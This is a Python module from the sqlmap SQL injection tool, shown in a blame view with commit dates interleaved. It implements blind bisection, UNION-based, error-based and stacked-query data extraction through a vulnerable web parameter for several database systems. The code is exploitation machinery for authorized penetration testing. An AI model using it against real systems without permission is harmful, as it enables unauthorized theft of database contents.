sqlmap/lib/request/inject.py

471 lines
18 KiB
Python
Raw Normal View History

2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
2008-10-15 19:56:32 +04:00
$Id$
2008-10-15 19:38:22 +04:00
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
2008-10-15 19:38:22 +04:00
"""
import re
import time
from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
2008-10-15 19:38:22 +04:00
from lib.core.common import cleanQuery
from lib.core.common import dataToSessionFile
2010-10-19 19:28:54 +04:00
from lib.core.common import dataToStdout
2008-10-15 19:38:22 +04:00
from lib.core.common import expandAsteriskForColumns
from lib.core.common import parseUnionPage
2010-10-11 17:52:32 +04:00
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
2008-10-15 19:38:22 +04:00
from lib.core.common import readInput
2010-10-19 19:28:54 +04:00
from lib.core.common import replaceNewlineTabs
from lib.core.common import safeStringFormat
from lib.core.convert import urlencode
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
2010-10-20 03:05:24 +04:00
from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.request.direct import direct
2008-10-15 19:38:22 +04:00
from lib.techniques.inband.union.use import unionUse
from lib.techniques.blind.inference import bisection
2008-10-15 19:38:22 +04:00
from lib.utils.resume import queryOutputLength
from lib.utils.resume import resume
def __goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None):
start = time.time()
2008-10-15 19:38:22 +04:00
if ( conf.eta or conf.threads > 1 ) and kb.dbms:
_, length, _ = queryOutputLength(expression, payload)
else:
length = None
2008-10-16 19:39:25 +04:00
dataToSessionFile("[%s][%s][%s][%s][" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], expression))
count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar)
2008-10-15 19:38:22 +04:00
debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start))
logger.debug(debugMsg)
2008-10-15 19:38:22 +04:00
return value
def __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected=None, num=None, resumeValue=True, charsetType=None, firstChar=None, lastChar=None):
outputs = []
origExpr = None
2008-10-15 19:38:22 +04:00
for field in expressionFieldsList:
output = None
if field.startswith("ROWNUM "):
continue
if isinstance(num, int):
origExpr = expression
expression = agent.limitQuery(num, expression, field)
if "ROWNUM" in expressionFieldsList:
expressionReplaced = expression
2009-01-23 01:28:27 +03:00
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
if resumeValue:
output = resume(expressionReplaced, payload)
2008-10-15 19:38:22 +04:00
if not output or ( expected == "int" and not output.isdigit() ):
if output:
warnMsg = "expected value type %s, resumed '%s', " % (expected, output)
warnMsg += "sqlmap is going to retrieve the value again"
logger.warn(warnMsg)
output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar)
2008-10-15 19:38:22 +04:00
if isinstance(num, int):
expression = origExpr
2008-10-15 19:38:22 +04:00
outputs.append(output)
return outputs
def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, resumeValue=True, unpack=True, charsetType=None, firstChar=None, lastChar=None):
2008-10-15 19:38:22 +04:00
"""
Retrieve the output of a SQL query characted by character taking
advantage of an blind SQL injection vulnerability on the affected
parameter through a bisection algorithm.
"""
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].inference)
2008-10-15 19:38:22 +04:00
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
count = None
startLimit = 0
stopLimit = None
outputs = []
test = None
untilLimitChar = None
untilOrderChar = None
if resumeValue:
output = resume(expression, payload)
else:
output = None
2008-10-15 19:38:22 +04:00
if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
2008-10-15 19:38:22 +04:00
return output
if not unpack:
return __goInference(payload, expression, charsetType, firstChar, lastChar)
2008-10-15 19:38:22 +04:00
if kb.dbmsDetected:
_, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(expression)
2008-10-15 19:38:22 +04:00
rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
if rdbRegExp and kb.dbms == "Firebird":
expressionFieldsList = [expressionFields]
2008-10-15 19:38:22 +04:00
if len(expressionFieldsList) > 1:
infoMsg = "the SQL query provided has more than a field. "
infoMsg += "sqlmap will now unpack it into distinct queries "
infoMsg += "to be able to retrieve the output even if we "
infoMsg += "are going blind"
logger.info(infoMsg)
# If we have been here from SQL query/shell we have to check if
# the SQL query might return multiple entries and in such case
# forge the SQL limiting the query output one entry per time
# NOTE: I assume that only queries that get data from a table
# can return multiple entries
if fromUser and " FROM " in expression:
limitRegExp = re.search(queries[kb.dbms].limitregexp, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
2008-10-15 19:38:22 +04:00
if limitRegExp or ( kb.dbms == "Microsoft SQL Server" and topLimit ):
2008-10-15 19:38:22 +04:00
if kb.dbms in ( "MySQL", "PostgreSQL" ):
limitGroupStart = queries[kb.dbms].limitgroupstart
limitGroupStop = queries[kb.dbms].limitgroupstop
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
elif kb.dbms == "Microsoft SQL Server":
if limitRegExp:
limitGroupStart = queries[kb.dbms].limitgroupstart
limitGroupStop = queries[kb.dbms].limitgroupstop
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
elif topLimit:
startLimit = 0
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
elif kb.dbms == "Oracle":
2008-10-15 19:38:22 +04:00
limitCond = False
else:
limitCond = True
# I assume that only queries NOT containing a "LIMIT #, 1"
# (or similar depending on the back-end DBMS) can return
# multiple entries
if limitCond:
if limitRegExp:
stopLimit = int(stopLimit)
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
if kb.dbms in ( "MySQL", "PostgreSQL" ):
stopLimit += startLimit
untilLimitChar = expression.index(queries[kb.dbms].limitstring)
expression = expression[:untilLimitChar]
elif kb.dbms == "Microsoft SQL Server":
stopLimit += startLimit
2008-10-15 19:38:22 +04:00
if not stopLimit or stopLimit <= 1:
if kb.dbms == "Oracle" and expression.endswith("FROM DUAL"):
test = "n"
elif batch:
test = "y"
2008-10-15 19:38:22 +04:00
else:
message = "can the SQL query provided return "
message += "multiple entries? [Y/n] "
2008-10-15 19:38:22 +04:00
test = readInput(message, default="Y")
if not test or test[0] in ("y", "Y"):
# Count the number of SQL query entries output
countFirstField = queries[kb.dbms].count % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
untilOrderChar = countedExpression.index(" ORDER BY ")
countedExpression = countedExpression[:untilOrderChar]
if resumeValue:
count = resume(countedExpression, payload)
2008-10-15 19:38:22 +04:00
if not stopLimit:
if not count or not count.isdigit():
count = __goInference(payload, countedExpression, charsetType, firstChar, lastChar)
2008-10-15 19:38:22 +04:00
if count and count.isdigit() and int(count) > 0:
2008-10-15 19:38:22 +04:00
count = int(count)
if batch:
2008-10-15 19:38:22 +04:00
stopLimit = count
else:
message = "the SQL query provided can return "
message += "up to %d entries. How many " % count
message += "entries do you want to retrieve?\n"
message += "[a] All (default)\n[#] Specific number\n"
message += "[q] Quit"
test = readInput(message, default="a")
2008-10-15 19:38:22 +04:00
if not test or test[0] in ("a", "A"):
stopLimit = count
2008-10-15 19:38:22 +04:00
elif test[0] in ("q", "Q"):
return "Quit"
2008-10-15 19:38:22 +04:00
elif test.isdigit() and int(test) > 0 and int(test) <= count:
stopLimit = int(test)
2008-10-15 19:38:22 +04:00
infoMsg = "sqlmap is now going to retrieve the "
infoMsg += "first %d query output entries" % stopLimit
logger.info(infoMsg)
2008-10-15 19:38:22 +04:00
elif test[0] in ("#", "s", "S"):
message = "How many? "
stopLimit = readInput(message, default="10")
2008-10-15 19:38:22 +04:00
if not stopLimit.isdigit():
errMsg = "Invalid choice"
logger.error(errMsg)
2008-10-15 19:38:22 +04:00
return None
2008-10-15 19:38:22 +04:00
else:
stopLimit = int(stopLimit)
2008-10-15 19:38:22 +04:00
else:
errMsg = "Invalid choice"
logger.error(errMsg)
return None
2008-10-15 19:38:22 +04:00
2008-12-17 23:11:18 +03:00
elif count and not count.isdigit():
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
logger.warn(warnMsg)
stopLimit = 1
2008-10-15 19:38:22 +04:00
elif ( not count or int(count) == 0 ):
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
2008-10-15 19:38:22 +04:00
logger.warn(warnMsg)
return None
elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
2008-10-15 19:38:22 +04:00
logger.warn(warnMsg)
return None
for num in xrange(startLimit, stopLimit):
output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
2008-10-15 19:38:22 +04:00
outputs.append(output)
return outputs
elif kb.dbms == "Oracle" and expression.startswith("SELECT ") and " FROM " not in expression:
expression = "%s FROM DUAL" % expression
outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
2008-10-15 19:38:22 +04:00
returnValue = ", ".join([output for output in outputs])
2008-10-15 19:38:22 +04:00
else:
returnValue = __goInference(payload, expression, charsetType, firstChar, lastChar)
2008-10-15 19:38:22 +04:00
return returnValue
def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
2008-10-15 19:38:22 +04:00
"""
Retrieve the output of a SQL query taking advantage of an inband SQL
injection vulnerability on the affected parameter.
"""
output = None
partial = False
data = []
condition = (
kb.resumedQueries and conf.url in kb.resumedQueries.keys()
and expression in kb.resumedQueries[conf.url].keys()
)
if condition and resumeValue:
2008-10-15 19:38:22 +04:00
output = resume(expression, None)
if not output or ( expected == "int" and not output.isdigit() ):
2008-10-15 19:38:22 +04:00
partial = True
if not output:
output = unionUse(expression, resetCounter=True, unpack=unpack, dump=dump)
2008-10-15 19:38:22 +04:00
if output:
data = parseUnionPage(output, expression, partial, condition, sort)
2008-10-15 19:38:22 +04:00
return data
def __goError(expression, resumeValue=True):
"""
Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter.
"""
logic = conf.logic
randInt = randomInt(1)
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
if resumeValue:
output = resume(expression, payload)
else:
output = None
if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
return output
if kb.dbmsDetected:
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
if kb.dbms == "MySQL":
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced)
else:
expressionUnescaped = unescaper.unescape(expression)
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
result = Request.queryPage(urlencode(forgedPayload), content=True)
match = re.search(queries[kb.misc.testedDbms].errorRegex, result[0], re.DOTALL | re.IGNORECASE)
if match:
output = match.group('result')
2010-10-19 18:47:13 +04:00
if output:
2010-10-20 03:05:24 +04:00
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
if kb.misc.testedDbms == 'MySQL':
output = output[:-1]
if conf.verbose > 0:
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
logger.info(infoMsg)
2010-10-19 19:28:54 +04:00
return output
2010-10-19 22:34:57 +04:00
def getValue(expression, blind=True, inband=True, error=True, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=False):
2008-10-15 19:38:22 +04:00
"""
Called each time sqlmap inject a SQL query on the SQL injection
affected parameter. It can call a function to retrieve the output
through inband SQL injection (if selected) and/or blind SQL injection
(if selected).
"""
2010-10-11 17:52:32 +04:00
if suppressOutput:
pushValue(conf.verbose)
conf.verbose = 0
if conf.direct:
2010-10-11 17:52:32 +04:00
value = direct(expression)
else:
expression = cleanQuery(expression)
expression = expandAsteriskForColumns(expression)
value = None
2010-10-11 17:52:32 +04:00
expression = expression.replace("DISTINCT ", "")
2008-10-15 19:38:22 +04:00
2010-10-19 22:34:57 +04:00
if error and conf.errorTest:
value = __goError(expression)
if not value:
warnMsg = "for some reasons it was not possible to retrieve "
warnMsg += "the query output through error SQL injection "
warnMsg += "technique, sqlmap is going %s" % ("inband" if inband and kb.unionPosition else "blind")
logger.warn(warnMsg)
if inband and kb.unionPosition and not value:
2010-10-11 17:52:32 +04:00
value = __goInband(expression, expected, sort, resumeValue, unpack, dump)
2010-10-11 17:52:32 +04:00
if not value:
warnMsg = "for some reasons it was not possible to retrieve "
warnMsg += "the query output through inband SQL injection "
warnMsg += "technique, sqlmap is going blind"
logger.warn(warnMsg)
2008-10-15 19:38:22 +04:00
2010-10-11 17:52:32 +04:00
oldParamFalseCond = kb.unionFalseCond
oldParamNegative = kb.unionNegative
kb.unionFalseCond = False
kb.unionNegative = False
2010-10-11 17:52:32 +04:00
if blind and not value:
value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
2010-10-11 17:52:32 +04:00
kb.unionFalseCond = oldParamFalseCond
kb.unionNegative = oldParamNegative
2010-10-11 17:52:32 +04:00
if value and isinstance(value, basestring):
value = value.strip()
2008-10-15 19:38:22 +04:00
2010-10-11 17:52:32 +04:00
if suppressOutput:
conf.verbose = popValue()
2010-03-18 20:36:58 +03:00
2008-10-15 19:38:22 +04:00
return value
def goStacked(expression, silent=False):
expression = cleanQuery(expression)
if conf.direct:
return direct(expression), None
debugMsg = "query: %s" % expression
logger.debug(debugMsg)
comment = queries[kb.dbms].comment
query = agent.prefixQuery("; %s" % expression)
query = agent.postfixQuery("%s;%s" % (query, comment))
payload = agent.payload(newValue=query)
page, _ = Request.queryPage(payload, content=True, silent=silent)
return payload, page
def goError(expression):
#expression = cleanQuery(expression)
if conf.direct:
return direct(expression), None
result = __goError(expression)
return result